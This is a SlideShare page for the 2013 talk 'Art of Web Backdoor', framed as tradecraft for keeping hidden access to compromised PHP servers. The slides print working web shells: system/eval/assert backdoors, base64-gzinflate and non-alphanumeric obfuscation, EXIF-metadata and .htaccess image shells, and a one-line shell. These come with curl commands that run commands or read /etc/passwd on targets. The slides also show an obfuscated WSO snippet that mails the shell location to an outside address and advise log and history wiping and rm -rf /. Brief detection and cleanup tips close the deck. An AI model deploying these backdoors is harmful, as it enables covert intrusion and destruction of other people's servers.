SlideShare a Scribd company logo

Art of Web Backdoor - Pichaya Morimoto

P
Pichaya Morimoto

Topic: Art of Web Backdoor Speaker: Pichaya Morimoto Event: 2600 Thailand Meeting #5 Date: September 6, 2013 Video: https://www.youtube.com/watch?v=QIXTPPBfLyI

Software
1 of 34
Download to read offline
Art of Web Backdoor stealth ways to hide your ass in pwned box pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
Overview ★ Anatomy of (PHP) Web Hacking ★ Maintaining Access ★ Techniques ★ Covering Tracks ★ Case Studies ★ Detect / Clean up
How we put web backdoor? High Risk Medium Risk Low Risk OWASP Top Ten 2013 A1-Injection A2-Broken Authentication and Session Management A3-Cross-Site Scripting (XSS) A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
Public CMS/Plugins PWN 1. Vulnerability Assessment and Mapping ★ Vulnerable version ? Vulnerability exists ? ★ Conditions match ? / Known limitations 2. Exploitation ★ Public exploit available? 2.1 Yes - Just use it ★ Review & test 2.2 No - Source code analysis ★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/ ★ Issue tracker (SVN/GIT repo.) ★ Public / private vulnerability discussion 3. Zero-Day - for l33t h4x0r! ★ Source code analysis without patch, valuable!
Joomla! - Unauthorised Uploads Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4 Fixed Date: 2013-July-31 (2.5.14, 3.1.5) Vulnerable files 1. libraries/joomla/filesystem/file. php 2. administrator/components/com_m edia/helpers/media.php Scenario 1. Joomla! <= 2.5.13 2. User with author privilege 3. OS = Windows Machine or misconfigured Apache + Linux Bypassing File Upload Restrictions in Joomla!
Known Issues or Limitations
Backdoor is a Feature for Admin!
Also in IPB, SMF, vBulletin
Latest vBulletin 5.0.4 - PHP Module
Case Study - Official Ubuntu Forums http://www.ubuntuforums.org/ ★ Hacked on 14 July 2013, Defaced on 20 July 2013 ★ 1.82 million users’ data leaked ★ Attacker had full access on Forums app servers ★ Servers running latest version of vBulletin What happened (posted in Canonical Blog) ● A moderator account was hacked ● Attacker post XSS to forum and sent to admin ● 31 seconds .. admin account was PWNED
IPB - Bad Sanitization Invision Power Board <= 3.4.4 Released on : 2013/05/13 by @johnjean Logical Vulnerability + Bad Sanitization 1. Create new user using .. admin@email.com+[150 spaces]+A 2. MySQL Limitation! string exceeding 150 characters are truncated and value will be trim to cause arbitrary user have same email as admin and change admin pass!
Other factors 3rd party components ★ uploadify, ckeditor, ckfinder, tinymce, openx Shared Hosting Security ★ Exposed Session Data ★ Improper user privileges (OS/Code execution, critical file manipulation) ★ Vulnerable services (SSH, FTP etc.) MITM, Insider attack, lack of physical access control etc.
Maintaining Access Add arbitrary accounts (*nix shadow, AD etc.) Reverse Shell and/or Bind Shell using ... ★ Binary/Script Backdoor 1. Bind Port to *nix shell 2. Send *nix shell back to attacker 3. Make a relay tunnel 4. Hidden trigger to spawn shell ★ Web Backdoor - Use less privileged! Connect via HTTP Methods & Headers (GET/POST etc.)
Simple PHP Backdoor <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die(); } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd $ curl -d “cat+/etc/passwd” http://target.com/simple-backdoor.php
Hide your ASS
Passing variables to PHP global vars: $_GET $_POST $_COOKIE $_REQUEST $_SERVER [‘HTTP_CMD’] Communication $ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system ('uname -a;ps -aux');"
base64_decode() + gzinflate() 1. Encode (Attacker Client) $ php -r "echo base64_encode(gzdeflate('system("id")'));" K64sLknN1VDKTFHSBAA= 2. Send (Attacker Client) $ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA=" 3. Decode (PHP Backdoor) @eval(gzinflate(base64_decode($_POST[“cmd”]))); 4. Output uid=33(www-data) gid=33(www-data) groups=33(www-data)
Code Evaluation besides eval() 1. assert() assert('sys' . 'tem('.$_POST["cmd"].')'); $ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'" 2. preg_replace() with -e modifier (deprecated in PHP 5.5.0) preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' ); $ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp" 3. And many more, e.g. OS command executions , check out this link! http://stackoverflow.com/questions/3115559/exploitable-php-functions
Stupid trick! but it’s work! ★ GNU license in beginning of a PHP file! /* Copyright (C) 1991 Free Software Foundation, Inc. This file is part of the GNU C Library. … */ <?php ... ★ PGP Public Key !? /* -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.10 (GNU/Linux) ... */ <?php … ★ Software license PROHIBIT to decode ★ More creative filename! ○ lndex.php ○ 1ndex.php ○ index2.php ○ wp-manual.php ○ cat.jpg.php ○ license.txt ○ README.md ○ .bash_profile
PHP: exif_read_data() 1. Create exif meta-data using exiftool $ exiftool 2600.jpg -Software=system $ exiftool 2600.jpg -Model=id 2. Put 2600.jpg along with backdoor $A = exif_read_data('2600.jpg'); $A['Software']($A['Model']); 3. Browse to backdoor and boom! uid=33(www-data) gid=33(www-data) groups=33(www-data)
.htaccess + any file format 1. Apache Configuration AllowOverride All 2. .htaccess <FilesMatch "2600.jpg"> SetHandler application/x-httpd-php </FilesMatch> 3. 2600.jpg <?php @system($_POST["cmd"]); ?>
one statement PHP backdoor <?@$_POST[0]($_POST[1])?> $ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
Binary Code in PHP Shell
Binary Code in PHP Shell
non-alphabet PHP shell <?$_="";$_[+""]='';$_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?> <?=${'_'.$_}['_'](${'_'.$_}['__']);?> $ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a" *** This code contains non-printable characters, it might not work if you copy & paste! ***
Common survivor feature! work for various type of OS (win/linux/osx ) and ISO ?? find writable directory read/write file merge into every files merge into backup db / files / zip reverse/bind php shell database client File management (symlink?) av/ids/ips/waf detect credential dumper os command network scanner TCP/UDP/HTTP/DNS Amp flood SOCKS Proxy for pivoting HTTP proxy, IRC connect back etc.
Exploit Pack
Free Kiddies Backdoor! c99 r57 wso icfdkshell weevely ASPsh msfpayload use at your own risk! Caution! There are many cases that backdoor served inside another backdoor *w*)a e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1. zip $x10="x6dai154";$x0b=$_SERVER ["x53x45RVE122_x4eAMx45"].$_SERVER ["123103x52Ix50x54_116101115E"];$x0c=" 141r162a171040".$x0b;$x0d=array("143x61","x6cx69"," 146x77162151x74x65","100","vx65x2e");$x0e=$x0d[2].$x0d [3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b); Decoded: mail(“fwrite@live.ca”,”target/backdoor.php”,”target/backdoor.php”);
Covering Tracks ★ root? ★ logs e.g. /var/log/* ★ history e.g. ~/.bash_history ★ self-destruction ★ rm -rf /
Detect / Prevent ★ Follow secure coding guideline ★ Security hardening checklists ★ Critical File Integrity Monitoring ★ VA / Pentest by certified guys ★ Patch Management & Patch Auditing ★ Centralized Log & WAF? $ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
MOD_Security ? var_dump(in_array('mod_security2', apache_get_modules ())); print_r(apache_get_modules());
Clean up 1. Change/reset passwords 2. Review log files 3. Hunting vulnerable apps/backdoors 4. Backup || Recovery $ grep - common danger functions $ find ★ newly created files ★ certain conditions (time/date/permission)
Practical Hacking? Capture The Flag https://ctftime.org/ Online challenges http://www.root-me.org/en/Challenges/ http://wargame2k10.nuitduhack.com/ http://captf.com/practice-ctf/ http://www.overthewire.org/wargames/natas/ http://www.modsecurity.org/demo/ VM Labs http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html https://pentesterlab.com/exercises/ http://vulnhub.com/ Thanks You !

Recommended

Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOpsPichaya Morimoto
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
 
На страже ваших денег и данных
На страже ваших денег и данныхНа страже ваших денег и данных
На страже ваших денег и данныхPositive Hack Days
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 

Recommended

Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOpsPichaya Morimoto
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
 
На страже ваших денег и данных
На страже ваших денег и данныхНа страже ваших денег и данных
На страже ваших денег и данныхPositive Hack Days
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpressn|u - The Open Security Community
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧Orange Tsai
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET websitePositive Hack Days
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and DefensesOWASP
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeilFramework
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys AdminsWill Schroeder
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptDenis Kolegov
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Angular js security
Angular js securityAngular js security
Angular js securityJose Manuel Ortega Candel
 
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?Pichaya Morimoto
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Pichaya Morimoto
 

More Related Content

What's hot

關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧Orange Tsai
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and DefensesOWASP
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeilFramework
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptDenis Kolegov
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 

What's hot (20)

Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpress
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
 
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
[OPD 2019] Side-Channels on the Web:
Attacks and Defenses
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackers
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradication
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Angular js security
Angular js securityAngular js security
Angular js security
 

Viewers also liked

CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?Pichaya Morimoto
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Pichaya Morimoto
 
From Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesFrom Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesPichaya Morimoto
 
Exploiting Php With Php
Exploiting Php With PhpExploiting Php With Php
Exploiting Php With PhpJeremy Coates
 
WebAPIではじめるphp入門
WebAPIではじめるphp入門WebAPIではじめるphp入門
WebAPIではじめるphp入門Hiroaki Murayama
 
Exploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesExploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesPichaya Morimoto
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Pichaya Morimoto
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 

Viewers also liked (10)

CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101
 
From Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesFrom Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutes
 
Exploiting Php With Php
Exploiting Php With PhpExploiting Php With Php
Exploiting Php With Php
 
WebAPIではじめるphp入門
WebAPIではじめるphp入門WebAPIではじめるphp入門
WebAPIではじめるphp入門
 
Exploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesExploiting Blind Vulnerabilities
Exploiting Blind Vulnerabilities
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Deep-Dive: Secure API Management
Deep-Dive: Secure API ManagementDeep-Dive: Secure API Management
Deep-Dive: Secure API Management
 

Similar to Art of Web Backdoor - Pichaya Morimoto

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Combell NV
 
Server hardening
Server hardeningServer hardening
Server hardeningTeja Babu
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hosterCombell NV
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
PHP from the point of view of a webhoster
PHP from the point of view of a webhosterPHP from the point of view of a webhoster
PHP from the point of view of a webhosterDominic Lüchinger
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsYan Cui
 
Php Inside - confoo 2011 - Derick Rethans
Php Inside - confoo 2011 - Derick RethansPhp Inside - confoo 2011 - Derick Rethans
Php Inside - confoo 2011 - Derick RethansBachkoutou Toutou
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Badge Poser v3.0 - A DevOps Journey
Badge Poser v3.0 - A DevOps JourneyBadge Poser v3.0 - A DevOps Journey
Badge Poser v3.0 - A DevOps JourneyFabio Cicerchia
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 

Similar to Art of Web Backdoor - Pichaya Morimoto (20)

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Download It
Download ItDownload It
Download It
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
